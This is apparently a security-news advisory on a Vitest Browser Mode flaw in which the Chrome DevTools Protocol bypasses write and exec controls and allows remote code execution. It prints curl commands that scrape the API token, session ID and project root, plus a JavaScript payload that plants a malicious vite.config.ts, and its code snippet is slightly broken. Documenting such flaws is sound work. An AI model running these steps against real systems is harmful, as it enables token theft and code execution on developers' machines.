Listen to this Post
This vulnerability arises because Vitest’s Browser Mode exposes a `cdp()` API that forwards raw Chrome DevTools Protocol (CDP) methods over the Vitest browser WebSocket RPC. Critically, these CDP operations are not gated by the browser.api.allowWrite, browser.api.allowExec, api.allowWrite, or `api.allowExec` security controls. Consequently, even when write and exec permissions are explicitly disabled (e.g., allowWrite: false, allowExec: false), a malicious client can still use CDP to perform equivalent actions.
In a verified proof-of-concept, an attacker first uses CDP’s `Page.setDownloadBehavior` command to set the browser’s download directory to the project’s root path. Next, they use `Runtime.evaluate` to inject JavaScript that creates a malicious `vite.config.ts` file and triggers its download. When Vitest automatically reloads this altered configuration file, the attacker’s Node.js code is executed on the host machine, achieving Remote Code Execution (RCE).
This becomes remotely exploitable when the Browser Mode API is exposed to the network (e.g., with --browser.api.host=0.0.0.0). In this scenario, the generated browser runner page inadvertently leaks all the metadata needed for an attack: the window.VITEST_API_TOKEN, active session ID, project name, and the absolute project root path. An attacker can retrieve these details and then connect directly to the browser’s WebSocket API to issue the malicious CDP commands.
DailyCVE Form:
Platform: Vitest (Browser Mode)
Version: 3.0.0 – 3.2.4, 4.0.0 – 4.1.7
Vulnerability : CDP Auth Bypass
Severity: Critical (9.8 CVSS)
date: 2026-06-01
Prediction: 2026-06-02 (Patched)
What Undercode Say:
Retrieve the victim’s browser context metadata to prepare for exploitation.
Extract the API token, session ID, and project root path from the public runner page. curl -s http://localhost:63315/__vitest_test__/ | grep -oP 'window.VITEST_API_TOKEN = "\K[^"]+' Capture API token curl -s http://localhost:63315/__vitest_test__/ | grep -oP '__vitest_browser_runner__.sessionId = "\K[^"]+' Capture session ID curl -s http://localhost:63315/__vitest_test__/ | grep -oP '__vitest_browser_runner__.config.root = "\K[^"]+' Capture project root
// Malicious JavaScript payload to be injected via Runtime.evaluate.
// This creates a backdoor Vite config that writes a flag to /tmp/pwned.
const maliciousConfig = <code>export default {
plugins: [{
name: 'malicious',
configResolved() {
require('fs').writeFileSync('/tmp/pwned', 'exploited');
}
}]
};</code>;
const blob = new Blob([bash], {type: 'text/javascript'});
const link = document.createElement('a');
link.href = URL.createObjectURL(blob);
link.download = 'vite.config.ts';
link.click();
Exploit:
- Connect to the victim’s WebSocket API using the stolen credentials.
- Issue CDP command to set the download folder to the project root.
- Issue CDP `Runtime.evaluate` to execute the malicious JavaScript.
- Wait for Vitest to reload the poisoned config and execute the payload.
Protection:
Update to the latest patched version: v5.0.0-beta.4, v4.1.8, or v3.2.5 immediately. If updating is not possible, ensure the API server is never exposed to the network (do not use host: '0.0.0.0'). Restrict network access to the Vitest API port via firewall rules.
Impact:
Successful exploitation allows an unauthenticated, remote attacker to execute arbitrary Node.js code on the host machine running Vitest. This leads to a full compromise of the development or testing environment, including data theft, installation of backdoors, or pivoting to internal networks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
